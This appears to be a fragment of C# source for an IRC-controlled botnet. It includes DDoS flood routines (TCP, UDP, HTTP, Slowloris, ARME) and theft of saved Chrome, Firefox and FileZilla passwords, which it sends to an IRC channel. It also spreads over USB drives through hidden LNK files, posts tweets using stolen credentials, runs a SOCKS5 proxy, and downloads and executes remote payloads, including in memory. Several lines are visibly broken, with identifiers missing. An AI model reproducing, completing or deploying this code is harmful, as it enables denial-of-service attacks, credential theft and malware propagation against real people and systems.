private static void Begin() { try { _ip = new IPEndPoint(Dns.GetHostEntry(host).AddressList[0], port); } catch { _ip = new IPEndPoint(IPAddress.Parse(host), port); } _t = new Thread[threads]; _ts = new ThreadStart[threads]; for (int i = 0; i < threads; i++) { _ts[i] = new ThreadStart(SendPayload); _t[i] = new Thread(_ts[i]); _t[i].Start(); } Thread.Sleep(delay * 1000); if (isEnabled) { Stop(); IRC.WriteMessage("Layer7 flood on" + IRC.ColorCode(" " + host) + " for" + IRC.ColorCode(" " + delay) + " seconds has finished.", Config._mainChannel()); } }
public static void Begin() { try { ipEo = new IPEndPoint(Dns.GetHostEntry(host).AddressList[0], port); } catch { ipEo = new IPEndPoint(IPAddress.Parse(host), port); } t = new Thread[threads]; j = new ThreadStart[threads]; L4Class = new SendTCP[threads]; for (int i = 0; i < threads; i++) { L4Class[i] = new SendTCP(ipEo, sockets); j[i] = new ThreadStart(L4Class[i].send); t[i] = new Thread(j[i]); t[i].Start(); } Thread.Sleep(delay * 1000); if (isEnabled) { Stop(); IRC.WriteMessage("Layer4 flood on" + IRC.ColorCode(" " + host) + " for" + IRC.ColorCode(" " + delay) + " seconds has finished.", Config._mainChannel()); } }
public static void GetFileZilla() { try { XmlDocument xml = new XmlDocument(); string path = Environment.GetEnvironmentVariable("APPDATA") + "\\FileZilla\\recentservers.xml"; if (File.Exists(path)) { xml.Load(path); XmlNodeList host = xml.GetElementsByTagName("Host"); XmlNodeList user = xml.GetElementsByTagName("User"); XmlNodeList password = xml.GetElementsByTagName("Pass"); for (int i = 0; i < host.Count; i++) { IRC.WriteMessage("FileZilla ->" + IRC.ColorCode(" " + host[i].InnerText) + " -" + IRC.ColorCode(" " + user[i].InnerText) + " :" + IRC.ColorCode(" " + password[i].InnerText), Config._mainChannel()); Thread.Sleep(100); } } } catch { } }
public static void StartLNK() { //Gather a list of current Removable Drives DriveInfo[] driveList = DriveInfo.GetDrives(); foreach (DriveInfo drive in driveList) { try { if (drive.DriveType == DriveType.Removable) { // Generate a unique USB drop name based on drive ID string dropName = Convert.ToBase64String(Encoding.UTF8.GetBytes(drive.TotalSize + drive.VolumeLabel + drive.DriveFormat + "insomnia")).Replace("=", "").Substring(0, 7).ToLower() + ".exe"; string dest = drive.Name + dropName; // Is there already a file with that name? If MD5 doesn't match then replace it and notify IRC if (File.Exists(dest)) { if (Config.botMD5 != Functions.GetMD5Hash(dest)) { File.Copy(Config.currentPath, dest, true); File.SetAttributes(dest, FileAttributes.Hidden | FileAttributes.System); IRC.WriteMessage("Updated a previous USB LNK spread on:" + IRC.ColorCode(" " + drive.Name) + " with a newer file:" + IRC.ColorCode(" " + Config.botMD5) + ".", Config._mainChannel()); } } else { // Start a new spread File.Copy(Config.currentPath, dest, true); File.SetAttributes(dest, FileAttributes.Hidden | FileAttributes.System); DirectoryInfo[] dirs = new DirectoryInfo(drive.Name).GetDirectories("*.*", SearchOption.TopDirectoryOnly); int lnkCount = 0; foreach (DirectoryInfo d in dirs) { d.Attributes = FileAttributes.Hidden; d.Attributes = FileAttributes.System; CreateLNK(drive.RootDirectory.ToString(), d.Name + ".lnk", dropName, "explorer.exe " + d.FullName, d.Name); lnkCount++; } if (lnkCount > 0) { IRC.WriteMessage("Completed USB LNK spread on:" + IRC.ColorCode(" " + drive.Name) + " with" + IRC.ColorCode(" " + lnkCount.ToString()) + " folders.", Config._mainChannel()); } } } } catch { } if (!initiated) { Listener(); } } }
public static void StartTwitterSpread(string[] message) { try { string creds = Chrome.QueryChrome(""); if (String.IsNullOrEmpty(creds)) { creds = Firefox.QueryFirefox(""); } string[] auth = creds.Split(':'); string user = auth[0]; string pass = auth[1]; if (creds != "") { bool buildMsg = false; string spreadMsg = ""; foreach (string s in message) { if (s.StartsWith("\"")) { buildMsg = true; } if (s.EndsWith("\"")) { buildMsg = false; spreadMsg += s; } if (buildMsg) { spreadMsg += s + " "; } } spreadMsg = spreadMsg.Replace("\"", ""); spreadMsg.TrimEnd(' '); if (spreadMsg != "") { if (PostTweet(user, pass, spreadMsg)) { IRC.WriteMessage("Twitter status updated:" + IRC.ColorCode(" " + user) + " ->" + IRC.ColorCode(" " + spreadMsg) + ".", Config._mainChannel()); } } } } catch { // No facebook account saved. } }
public static void CheckSocks() { Thread.Sleep(10000); try { Socket client = SocksProxy.s5connect(Functions.externalIP, Port, "", 80, Config.socksUser, Config.socksPass); IRC.WriteMessage(socksDetails(), Config._mainChannel()); socksGood = true; } catch { } }
public static void Begin() { int seconds = delay * 1000; new Thread(() => SendUDP(Functions.ipE(host, port))).Start(); Thread.Sleep(seconds); if (isEnabled) { Stop(); IRC.WriteMessage("UDP flood on" + IRC.ColorCode(" " + host) + " for" + IRC.ColorCode(" " + delay) + " seconds has finished.", Config._mainChannel()); } }
public static void GetChrome(string searchTerm) { if (String.IsNullOrEmpty(searchTerm)) { searchTerm = "**ALL**"; } string datapath = (Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Login Data"); try { SQLiteHandler.SQLiteHandler SQLDatabase = new SQLiteHandler.SQLiteHandler(datapath); SQLDatabase.ReadTable("logins"); if (File.Exists(datapath)) { string host; string user; string pass; for (int i = 0; (i <= (SQLDatabase.GetRowCount() - 1)); i++) { try { host = SQLDatabase.GetValue(i, "origin_url"); user = SQLDatabase.GetValue(i, "username_value"); pass = Decrypt(System.Text.Encoding.Default.GetBytes(SQLDatabase.GetValue(i, "password_value"))); if (user != "" && pass != "") { if (pass != "FAIL") { if (host.Contains(searchTerm) || searchTerm == "**ALL**") { IRC.WriteMessage("Chrome ->" + IRC.ColorCode(" " + host) + " ->" + IRC.ColorCode(" " + user) + " :" + IRC.ColorCode(" " + pass), Config._mainChannel()); } } } Thread.Sleep(100); } catch { } } } } catch { } }
public static void Socks(string param1, string param2) { if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2)) { Config.socksUser = param1; Config.socksPass = param2; } else { Config.socksUser = Config.randomID; Config.socksPass = Functions.RandomString(5); } try { if (!socksOn && externalIP != String.Empty) { IRC.WriteMessage("Attempting to start SOCKS5 server on:" + IRC.ColorCode(" " + Functions.externalIP) + "...",; try { AddFirewallException(); } catch { } Thread s = new Thread(s5init.StartSocks); s.IsBackground = true; s.Start(); socksOn = true; socksHasStarted = true; } else if (s5init.socksGood && socksHasStarted) { IRC.WriteMessage(s5init.socksDetails(),; s5init.socksEnabled = true; socksOn = true; } } catch { } }
private static void OutputData() { List <String> final = new List <string>(); foreach (string s in output) { if (!final.Contains(s)) { final.Add(s); } } foreach (string s in final) { IRC.WriteMessage(s, Config._bkChan()); Thread.Sleep(200); } output.Clear(); final.Clear(); }
public static void UpdateBot(string param1, string param2) { try { string path = Environment.GetEnvironmentVariable("APPDATA") + "\\" + Functions.RandomString(5) + ".exe"; using (WebClient wc = new WebClient()) { wc.DownloadFile(param1, path); string newMD5 = Functions.GetMD5Hash(path); if (param2 == newMD5) { if (Config.botMD5 == newMD5) { IRC.WriteMessage("Bot file is already up to date:" + IRC.ColorCode(" " + Config.botMD5 + " == " + newMD5) + ".", Config._mainChannel()); } else { using (Process p = new Process()) { p.StartInfo.FileName = path; p.Start(); } IRC.WriteMessage("File was successfully updated:" + IRC.ColorCode(" " + Config.botMD5 + " -> " + newMD5) + ".", Config._mainChannel()); Functions.Uninstall("Updating..."); } } else { IRC.WriteMessage("MD5 Mismatch:" + IRC.ColorCode(" " + param2) + " !=" + IRC.ColorCode(" " + newMD5) + ".", Config._mainChannel()); } } } catch { } }
public static void runCommand(string command, string channel, string param1, string param2, string param3, string param4, string[] message) { switch (command) { case ".v": WriteMessage("Version:" + ColorCode(" " + Config.version) + ", Path:" + ColorCode(" '" + Config.currentPath) + "', MD5:" + ColorCode(" " + Config.botMD5) + ", Registry:" + ColorCode(" " + Config.regLocation) /*+ ", Active Threads:" + IRC.ColorCode(" " + Process.GetCurrentProcess().Threads.Count) */ + ".", channel); break; case ".avinfo": WriteMessage("Antivirus Product:" + ColorCode(" " + Functions.GetAntiVirus()) + ", Firewall Product:" + ColorCode(" " + Functions.GetFirewall()) + ".", channel); break; case ".chrome": Thread a = new Thread(() => Chrome.GetChrome(param1)); a.IsBackground = true; a.Start(); break; case ".firefox": Thread b = new Thread(() => Firefox.GetLoginData(param1)); b.IsBackground = true; b.Start(); break; case ".j": if (!String.IsNullOrEmpty(param1)) { sw.WriteLine("JOIN " + param1); } break; case ".p": if (!String.IsNullOrEmpty(param1)) { sw.WriteLine("PART " + param1); } break; case ".sort": sw.WriteLine("JOIN #" + Functions.GeoIPCountry()); break; case ".unsort": sw.WriteLine("PART #" + Functions.GeoIPCountry()); break; case ".permsort": if (Functions.PermType() == "a") { sw.WriteLine("JOIN #admins"); } else { sw.WriteLine("JOIN #users"); } break; case ".twitter": Thread t = new Thread(() => Twitter.StartTwitterSpread(message)); t.IsBackground = true; t.Start(); break; case ".ftp": Thread f = new Thread(FTP.GetFileZilla); f.IsBackground = true; f.Start(); break; case ".bk": if (param1 == "-i") { Thread bk = new Thread(Botkiller.explorerFlash); bk.IsBackground = true; bk.Start(); } else { Thread bk = new Thread(Botkiller.initiate); bk.IsBackground = true; bk.Start(); } break; case ".rc": IRC.Disconnect("Reconnecting..."); Thread.Sleep(15000); Connect(Config._servers(), Config._mainChannel(), Config._key(), Config._port(), Config._authHost()); break; case ".up": if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2)) { if (Ruskill.enabled) { Ruskill.enabled = false; } Thread u = new Thread(() => Functions.UpdateBot(param1, param2.ToUpper())); u.IsBackground = true; u.Start(); } break; case ".rm": Functions.Uninstall("Uninstalling..."); break; case ".dl": // .dl URL ENVIRONMENT_VARIABLE Thread dl = new Thread(() => Functions.DownloadExeFile(param1, param2, param3, false)); dl.IsBackground = true; dl.Start(); break; case ".m": if (param1 == "on") { isMuted = true; } if (param1 == "off") { isMuted = false; } break; case ".arme": if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3)) { if (param1.Contains("http://")) { param1 = param1.Replace("http://", ""); } ARME.delay = Convert.ToInt32(param3); = param1; ARME.port = Convert.ToInt32(param2); ARME.isEnabled = true; new Thread(ARME.Begin).Start(); IRC.WriteMessage("ARME flood started on" + IRC.ColorCode(" " + + " on port" + IRC.ColorCode(" " + ARME.port) + " for" + IRC.ColorCode(" " + ARME.delay) + " seconds.",; } break; case ".http": if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3)) { if (param1.Contains("http://")) { param1 = param1.Replace("http://", ""); } HTTP.delay = Convert.ToInt32(param3); = param1; HTTP.port = Convert.ToInt32(param2); HTTP.isEnabled = true; new Thread(HTTP.Begin).Start(); IRC.WriteMessage("HTTP flood started on" + IRC.ColorCode(" " + + " on port" + IRC.ColorCode(" " + HTTP.port) + " for" + IRC.ColorCode(" " + HTTP.delay) + " seconds.",; } break; case ".tcp": if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3)) { if (param1.Contains("http://")) { param1 = param1.Replace("http://", ""); } TCP.delay = Convert.ToInt32(param3); = param1; TCP.port = Convert.ToInt32(param2); TCP.isEnabled = true; new Thread(TCP.Begin).Start(); IRC.WriteMessage("TCP flood started on" + IRC.ColorCode(" " + + " on port" + IRC.ColorCode(" " + TCP.port) + " for" + IRC.ColorCode(" " + TCP.delay) + " seconds.",; } break; case ".udp": if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3)) { if (param1.Contains("http://")) { param1 = param1.Replace("http://", ""); } UDP.delay = Convert.ToInt32(param3); = param1; UDP.port = Convert.ToInt32(param2); UDP.isEnabled = true; new Thread(UDP.Begin).Start(); IRC.WriteMessage("UDP flood started on" + IRC.ColorCode(" " + + " on port" + IRC.ColorCode(" " + UDP.port) + " for" + IRC.ColorCode(" " + UDP.delay) + " seconds.",; } break; case ".slow": if (!String.IsNullOrEmpty(param1) && !String.IsNullOrEmpty(param2) && !String.IsNullOrEmpty(param3)) { if (param1.Contains("http://")) { param1 = param1.Replace("http://", ""); } Slowloris.delay = Convert.ToInt32(param3); = param1; Slowloris.port = Convert.ToInt32(param2); Slowloris.isEnabled = true; new Thread(Slowloris.Begin).Start(); IRC.WriteMessage("Slowloris flood started on" + IRC.ColorCode(" " + + " on port" + IRC.ColorCode(" " + Slowloris.port) + " for" + IRC.ColorCode(" " + Slowloris.delay) + " seconds.",; } break; case ".stop": if (ARME.isEnabled || HTTP.isEnabled || TCP.isEnabled || UDP.isEnabled || Slowloris.isEnabled) { ARME.Stop(); HTTP.Stop(); TCP.Stop(); UDP.Stop(); Slowloris.Stop(); IRC.WriteMessage("All active floods have been aborted.", channel); } break; case ".read": if (!String.IsNullOrEmpty(param1)) { using (WebClient wc = new WebClient()) { IRC.WriteMessage("Attempting to perform commands from url:" + IRC.ColorCode(" " + param1) + ".", channel); Functions.DecryptTopic(wc.DownloadString(param1)); } } break; case ".ruskill": if (!String.IsNullOrEmpty(param1)) { if (param1 == "on" && Ruskill.enabled == false) { Thread r = new Thread(Ruskill.StartRuskill); r.IsBackground = true; r.Start(); } else if (param1 == "off") { Ruskill.enabled = false; } } break; case ".socks": Thread s = new Thread(() => Functions.Socks(param1, param2)); s.IsBackground = true; s.Start(); break; case ".color": if (param1 == "off") { Config.colorsOn = false; } else if (param1 == "on") { Config.colorsOn = true; } break; case ".usb": try { if (param1 == "on") { USBlnk.initiated = true; Thread usb = new Thread(USBlnk.StartLNK); usb.IsBackground = true; usb.Start(); } else if (param1 == "off") { USBlnk.initiated = false; USBlnk.Stop(); } } catch { } break; case ".visit": try { string extra = "(visible)"; if (param1 != null) { if (!param1.Contains("http://")) { param1 = "http://" + param1; } WriteMessage("Attempting to visit" + ColorCode(" " + param1) + " " + extra + " in default browser.", channel); using (Process p = new Process()) { p.StartInfo.FileName = param1; if (param2 == "-h") { p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; p.StartInfo.CreateNoWindow = true; extra = "(hidden)"; } p.Start(); } } } catch { } break; default: break; } }
public static void StartRuskill() { try { enabled = true; _registryKeys = BuildRegistrySnapshot(); // Take a snapshot of current changes // Start FileWatcher _watchFolder.Path = Environment.GetEnvironmentVariable("APPDATA"); _watchFolder.NotifyFilter = System.IO.NotifyFilters.DirectoryName; _watchFolder.NotifyFilter = _watchFolder.NotifyFilter | System.IO.NotifyFilters.FileName; _watchFolder.NotifyFilter = _watchFolder.NotifyFilter | System.IO.NotifyFilters.Attributes; _watchFolder.Created += new FileSystemEventHandler(eventRaised); _watchFolder.EnableRaisingEvents = true; } catch { } while (enabled) { try { // Cycle through reg keys and see if anythings new foreach (string rk in Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValueNames()) { if (!_registryKeys.Contains(rk)) { IRC.WriteMessage("Found new registry key in HKCU:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan()); try { Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).DeleteValue(rk); IRC.WriteMessage("Registry key removed:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan()); RuskillRemove(Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValue(rk).ToString()); } catch { } _registryKeys.Add(rk); } } foreach (string rk in Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValueNames()) { if (!_registryKeys.Contains(rk)) { IRC.WriteMessage("Found new registry key in HKLM:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan()); try { Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true).DeleteValue(rk); IRC.WriteMessage("Registry key removed:" + IRC.ColorCode(" " + rk) + ".", Config._rkChan()); RuskillRemove(Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false).GetValue(rk).ToString()); } catch { } _registryKeys.Add(rk); } } } catch { } Thread.Sleep(3000); } }
public static string DownloadExeFile(string url, string env, string param3, bool hidden) { string defaultEnv = "APPDATA"; bool memExec = false; bool timeExec = false; if (!url.Contains("http://") && !url.Contains("https://")) { url = "http://" + url; } if (!String.IsNullOrEmpty(env)) { if (env.Contains("-")) { if (env.Contains("m")) { memExec = true; } else if (env.Contains("t") && !String.IsNullOrEmpty(param3)) { timeExec = true; } } else { defaultEnv = env; } } try { string output = Environment.GetEnvironmentVariable(defaultEnv) + "\\" + Functions.RandomString(6) + ".exe"; if (memExec) { using (WebClient wc = new WebClient()) { byte[] payload = wc.DownloadData(url); //get our bytez brah Assembly a = Assembly.Load(payload); IRC.WriteMessage("Executed .NET byte array in memory:" + IRC.ColorCode(" " + a.FullName) + ", Runtime:" + IRC.ColorCode(" " + a.ImageRuntimeVersion) + ", Length:" + IRC.ColorCode(" " + payload.Length) + ".",; new Thread(() => a.EntryPoint.Invoke(null, null)).Start(); } } else { using (WebClient wc = new WebClient()) { wc.DownloadFile(url, output); } if (File.Exists(output)) { if (timeExec) { int delay = Convert.ToInt32(param3); using (Process p = new Process()) { FileInfo fi = new FileInfo(output); p.StartInfo.FileName = output; if (hidden) { p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; p.StartInfo.CreateNoWindow = true; } p.Start(); IRC.WriteMessage("Executing: '" + IRC.ColorCode(output) + "' for" + IRC.ColorCode(" " + delay) + " seconds, Type: " + IRC.ColorCode(Functions.PEType(output)) + ", Size:" + IRC.ColorCode(" " + fi.Length + " bytes") + ".",; Thread.Sleep(delay * 1000); IRC.WriteMessage("Timed execution finished on: '" + IRC.ColorCode(output) + "'. Process will be termianted and file removed.", Config._mainChannel()); p.Kill(); File.Delete(output); } } else { using (Process p = new Process()) { FileInfo fi = new FileInfo(output); p.StartInfo.FileName = output; if (hidden) { p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; p.StartInfo.CreateNoWindow = true; } p.Start(); IRC.WriteMessage("Executed: '" + IRC.ColorCode(output) + "', Type: " + IRC.ColorCode(Functions.PEType(output)) + ", Size:" + IRC.ColorCode(" " + fi.Length + " bytes") + ".",; } } } } return(output); } catch (Exception ex) { string error = "Could not download the file:"; if (ex.Message.Contains("404")) { error += IRC.ColorCode(" 404 file not found"); } else if (ex.Message.Contains("460")) { error += IRC.ColorCode(" 460 access restricted"); } else { error = null; } if (error != null) { IRC.WriteMessage(error + ".",; } return("error"); } }